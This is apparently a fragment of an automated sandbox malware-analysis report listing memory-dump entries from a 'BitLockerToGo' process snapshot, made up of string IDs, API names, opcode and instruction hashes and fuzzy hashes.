                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4`[b${z}|
                                                                                                                                                                                                                                • API String ID: 0-870993828
                                                                                                                                                                                                                                • Opcode ID: 4fbb4f93d9979b7d3c5996dcf88e71f4b02fd12bcd160479c786faa415606bcb
                                                                                                                                                                                                                                • Instruction ID: 3f5577fd3dbc40fed14d85fb734be66a37c1ec3c63a8bd8c2c48a74d3a55770c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fbb4f93d9979b7d3c5996dcf88e71f4b02fd12bcd160479c786faa415606bcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A821C13AA092108BD710DF19C9C063BB3A3EBE9715F29D96DC8C427319C735DC01879A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @ZB
                                                                                                                                                                                                                                • API String ID: 0-1465762224
                                                                                                                                                                                                                                • Opcode ID: a1c1ea8a2b4570ed0d36c36da7fb9b5eb20f05c99ade1a15a26becdbcb244e19
                                                                                                                                                                                                                                • Instruction ID: 6748e5e2416b5451cc00e56258bd1c07638d78cbe7c17738925c004264d10e84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1c1ea8a2b4570ed0d36c36da7fb9b5eb20f05c99ade1a15a26becdbcb244e19
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D812F576E00626CBCB14CF58D890AEEF7B2FF49350F99815AD441AB360DB349C91DB94
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00445BA0,00000000,00000001,00445B90), ref: 00422109
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                                                                                                • Opcode ID: 2fb1db34b053a887d03afdae219d88732e3b81a874605581c14f8906598bceac
                                                                                                                                                                                                                                • Instruction ID: aca91315e2ae18744c793c9ec82994632b3b8664892ed7269cc0248500ba04ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fb1db34b053a887d03afdae219d88732e3b81a874605581c14f8906598bceac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B551DDB1700224ABDB209B24DC82F7733B4EF81758F544559FA85CB391E3B9E905C76A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 0-2679148245
                                                                                                                                                                                                                                • Opcode ID: 75bf342835c651dec9a6d3590754d8539289847b958611c6d324ff21a5d299f1
                                                                                                                                                                                                                                • Instruction ID: 21a923c62164193a7026f79e1a0342658a4c8f458f5073aca577c0fa54c7be1f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75bf342835c651dec9a6d3590754d8539289847b958611c6d324ff21a5d299f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF18D7160C3408BD320DF19C49061BBBE1ABD5714F188A7EE8D99B791D739D80ACB4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: P
                                                                                                                                                                                                                                • API String ID: 0-3110715001
                                                                                                                                                                                                                                • Opcode ID: 22cb78d4794770066730cdb86dbe104ecfa0b844860838ba6af9d13069d9e2d4
                                                                                                                                                                                                                                • Instruction ID: 749d1a0a39580f1878f68e897c6ea374332a201860d089a4f090ddeb3b601e29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22cb78d4794770066730cdb86dbe104ecfa0b844860838ba6af9d13069d9e2d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5D1F4329082604FE725CE18989075FB7E1EBC5714F168A2DE8B66B390CB759C46C7C6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                • Opcode ID: 919eef6af8bb4ff6ccb6a6ef59d22537db30977df81fc64e855f364606738c6e
                                                                                                                                                                                                                                • Instruction ID: 669377d9c86ad8dce71e2a946c9bccc9d6337bf7d40bd5ee4e38fb5997f32952
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 919eef6af8bb4ff6ccb6a6ef59d22537db30977df81fc64e855f364606738c6e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC115B1B08325ABD7148E24E48076BB7D9EFC4314F58896FE9958B381D738DC4487DA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: FFA
                                                                                                                                                                                                                                • API String ID: 0-749646309
                                                                                                                                                                                                                                • Opcode ID: cc46ca72be30d56bc0b0b49976af55729f74161f1196579620707417fed1549f
                                                                                                                                                                                                                                • Instruction ID: 67e9b897e429dbf4bbca25bcf46ff75dc5c05b0921cca643d985ff357d34d3fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc46ca72be30d56bc0b0b49976af55729f74161f1196579620707417fed1549f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDD136B4600A418FD324CF29C590B66B7F2BF9A304F24886DD1DACB751E739E885CB94
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: lm
                                                                                                                                                                                                                                • API String ID: 0-3146918833
                                                                                                                                                                                                                                • Opcode ID: 84d3a82c380c7e57a8691418e3af1a3713e7a71dae091842bbe71f2a9b5bd2d7
                                                                                                                                                                                                                                • Instruction ID: a10f991417f44967083c38efc071b073d8c7be75c208bd7fcfed23da96902ddd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d3a82c380c7e57a8691418e3af1a3713e7a71dae091842bbe71f2a9b5bd2d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BA1B6B0D042AACFDF15CFA8C4906EEBBB1EF56304F14415ED491AB382D3399946CB99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                • Opcode ID: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
                                                                                                                                                                                                                                • Instruction ID: 089e9477960396251df453742864b6407c12bea89c8ab8b0dc7cabb74b7dc863
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2471E532B083254BD714CE29E48031BBBD2EBC5720F99C96EE4949B395D7789C4587CA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: b&D
                                                                                                                                                                                                                                • API String ID: 0-108904689
                                                                                                                                                                                                                                • Opcode ID: cba73f731748f81edd7e78de8adafcd74ad548ec64b6cbe72f3a9a2c6d442f70
                                                                                                                                                                                                                                • Instruction ID: 65d54ebff7b1b30d616c6e9fe259c24d96ca59af16bcfaad391b2fd457f62fd3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cba73f731748f81edd7e78de8adafcd74ad548ec64b6cbe72f3a9a2c6d442f70
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F51CB35608212DFD308CF28D59062AB7E2FF8A314F49C96DE88A87354D775D802CB8A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                • Opcode ID: 42583cba9d8197ff2f1565c75287919ffaaaa89dd13b8c85752011544ba30f06
                                                                                                                                                                                                                                • Instruction ID: d763ce7e2807f4d1dba8244f68b49d859bba839b422bdfa8d019a9567ecbc3f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42583cba9d8197ff2f1565c75287919ffaaaa89dd13b8c85752011544ba30f06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C53198751083009BD300DF58C880A6BF7F5FF95714F14892EE988973A1E779DA088B9A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: BA
                                                                                                                                                                                                                                • API String ID: 0-4106204548
                                                                                                                                                                                                                                • Opcode ID: 9398820c9810dd3a66288c3ab10c819df957d5aae261434e5cf52acbe0deee9b
                                                                                                                                                                                                                                • Instruction ID: c183f341ff94f5a9e7b589d548fc7084d5cb51ca120d1decf44d00800278d473
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9398820c9810dd3a66288c3ab10c819df957d5aae261434e5cf52acbe0deee9b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8314DB9A00216CFCB10CF69E880AAFB7F0FB4E314F04486AE859E3241D335E955CB58
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: BA
                                                                                                                                                                                                                                • API String ID: 0-4106204548
                                                                                                                                                                                                                                • Opcode ID: d04e5803a07c060e19f502f421556cc083feba9df7065b59cb4636891f4dc94a
                                                                                                                                                                                                                                • Instruction ID: 2d2aedbc773362089c14615bf4632706c93907be932d99e29da60b4579787306
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d04e5803a07c060e19f502f421556cc083feba9df7065b59cb4636891f4dc94a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47213BB9A00216DFCB50CF59D880AAEB7F0FB0A314F00486AE819E3342D335E915CB68
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: *~H
                                                                                                                                                                                                                                • API String ID: 0-52463614
                                                                                                                                                                                                                                • Opcode ID: acb940084597a5aabb2b6d35758733eb1593b90696031e15041d60a002f31773
                                                                                                                                                                                                                                • Instruction ID: 0919923f2025c580a79695361f3244367fa6a3dc5a3993e0cfc9194da1c57ec0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acb940084597a5aabb2b6d35758733eb1593b90696031e15041d60a002f31773
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06C04C68E6C00096C28C8B14D9615B566B5DF9B209714697A820377252E720D452465C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4c0729b2a69d013f8afcb7feec190cb62b85eda0f25440774d7ce5cf09154caa
                                                                                                                                                                                                                                • Instruction ID: 43c00284d34a8f762d1eb270c08578c73c424094bb1ec424fb7dce2ea16b284d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c0729b2a69d013f8afcb7feec190cb62b85eda0f25440774d7ce5cf09154caa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A52C77190C3458FCB15CF24C0906AABBE1BF89314F19867EF89967381D779E849CB86
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 05312d2382b0e0403b850a14dfc3a10a585d498207a9d00afdbc81dc4084c10a
                                                                                                                                                                                                                                • Instruction ID: afd2b8448b66c7013f6dff28cde51f52b9385414e247fc83c016772feada05bd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05312d2382b0e0403b850a14dfc3a10a585d498207a9d00afdbc81dc4084c10a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E02DFB56006018FD724CF29D880B67B7F2EF9A305F144A6ED08A87791EB39F945CB58
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8d0a6a7f23968e7c9a59c3a274f8a5a1f6bf2bd2ccb699640aae0f92fe24c1b9
                                                                                                                                                                                                                                • Instruction ID: 0818c82bac18e4ecb824a7b9fdd202ff9b17d6763a3772f098872b4398c42e7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d0a6a7f23968e7c9a59c3a274f8a5a1f6bf2bd2ccb699640aae0f92fe24c1b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17F1BF356083418FC724CF29C88166BFBE2BFD9304F08892DE8D697791E679E854CB56
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 591eb5b2709c2dcb0d83642f253dea7e5f94981680aa4e702ab7582c103723bd
                                                                                                                                                                                                                                • Instruction ID: 0b48fc2dd65385a58c20e1ecc707f37fca6c0ce111ed70d5b8f26412be3443d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 591eb5b2709c2dcb0d83642f253dea7e5f94981680aa4e702ab7582c103723bd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E149746006419FD325CF29C880B66B7F2FF9A304F24895DD1DA8B752D739E885CB98
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e70ff7770178eeb955163900981a42409e2f10a5b88d8740b982c5ea5c7d191d
                                                                                                                                                                                                                                • Instruction ID: dd65459bee4c2c55f701f08b763e58c66194f92c273f9eb3775a4e05a13c12c2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e70ff7770178eeb955163900981a42409e2f10a5b88d8740b982c5ea5c7d191d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA1CD746083429BD724DF18D880A2BB3F1FF85B51F14882DE9859B362E735ED11CB9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40cc7e2b4b679fdcf89d9f9fd4551e17dc4ac27724528fbe2d47a2999119fdf3
                                                                                                                                                                                                                                • Instruction ID: 47cd82d86e10ce2a8d3489fd5d09173f9dfd21b8ac9da63d0df847a566da7d12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40cc7e2b4b679fdcf89d9f9fd4551e17dc4ac27724528fbe2d47a2999119fdf3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0814971A043005BF724DB25CC41B6BB6D5EBC4314F14493EFA99D3392E638EC588B9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 765b75d33bff5e09d303b3defc1737ea23ee54930a18ce0d4727dc7b8825d110
                                                                                                                                                                                                                                • Instruction ID: e1caf67bd762bcce325636bdfcd7c41765f5eb51b7ce31ef0328ba438efac0a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 765b75d33bff5e09d303b3defc1737ea23ee54930a18ce0d4727dc7b8825d110
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9781B574A0C3518FC315CF28D49062ABBE2AFC9314F18CA6EE4E58B352D739D846CB56
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 06fa7bd75e2a2573cd87cdbe5ac5aa0990299d591017b25f762d05360a3326ab
                                                                                                                                                                                                                                • Instruction ID: 43de12d7b22f400502b5fd4791742bfb017e453830da8d1b3c24711a931bb963
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06fa7bd75e2a2573cd87cdbe5ac5aa0990299d591017b25f762d05360a3326ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF515975948342DFD720CF18D881AABBBF1EB8A344F01486DE9A997311D7359C90DB86
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: be4733d1af1dfaa67048aabffea5949928d5dd8f44169a56a4aad9628d3466db
                                                                                                                                                                                                                                • Instruction ID: cfe7c6e762409ce99aca23f2808c098d3bf76cc2cf03f797b6c85d4495535ff3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be4733d1af1dfaa67048aabffea5949928d5dd8f44169a56a4aad9628d3466db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6251BFB5A042009FC714AF19C880927B7A1FF85328F158A7EEC59AB392E735EC51CF95
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                                                                                                                                                • Instruction ID: 458a06ff1c20eb11bed27bc5ccb5029b8ade5118bc179b9b4ce2029d96cd6170
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fb7f438c5c4dca9d542d010704f564aa8c339b5d82f191b9433bdcfd20d3972
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC41DB3170C2754BC7149A2D8C5413ABAD24FC6608F0EC67AE8DAAB7C7E5389D1057D9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fafc5712370b9258e30c483214ffbb8b7fb0dc730be0cc11a82afa97795a9cf6
                                                                                                                                                                                                                                • Instruction ID: f9497648a7a1d5baf7aac11b27232970a1baa2bc0aa2a529af95bc0fee4901f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fafc5712370b9258e30c483214ffbb8b7fb0dc730be0cc11a82afa97795a9cf6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34318975E041598BCB14CFA5D9906BEB3B1BFA9308F240839D40277381E3796C52CB29
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f86bdef12d4b5506f5c09384946f54c702c902f27077e8b344c32a4bbb5703af
                                                                                                                                                                                                                                • Instruction ID: 0e495729fa1fd8c203cdb94302ca5298d13bd3710aaf31e96071db738a4bf244
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f86bdef12d4b5506f5c09384946f54c702c902f27077e8b344c32a4bbb5703af
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21CE74A08341ABE714CF04C980A6BB7E2FBC5704F50882EF89497392D774DD059B9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a4a6661b1961d6c2bada0582475319006a599dd67855d1c8179357efada702ff
                                                                                                                                                                                                                                • Instruction ID: 905a920b73578e8a1421de1b59e53ec13c2d80f19a5b7103370e352ac862c0e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4a6661b1961d6c2bada0582475319006a599dd67855d1c8179357efada702ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23315AB0A047018FD735CF24C5807A7B7E5AB85704F248A2EE49687B45E778F889CB59
                                                                                                                                                                                                                                Memory Dump Source
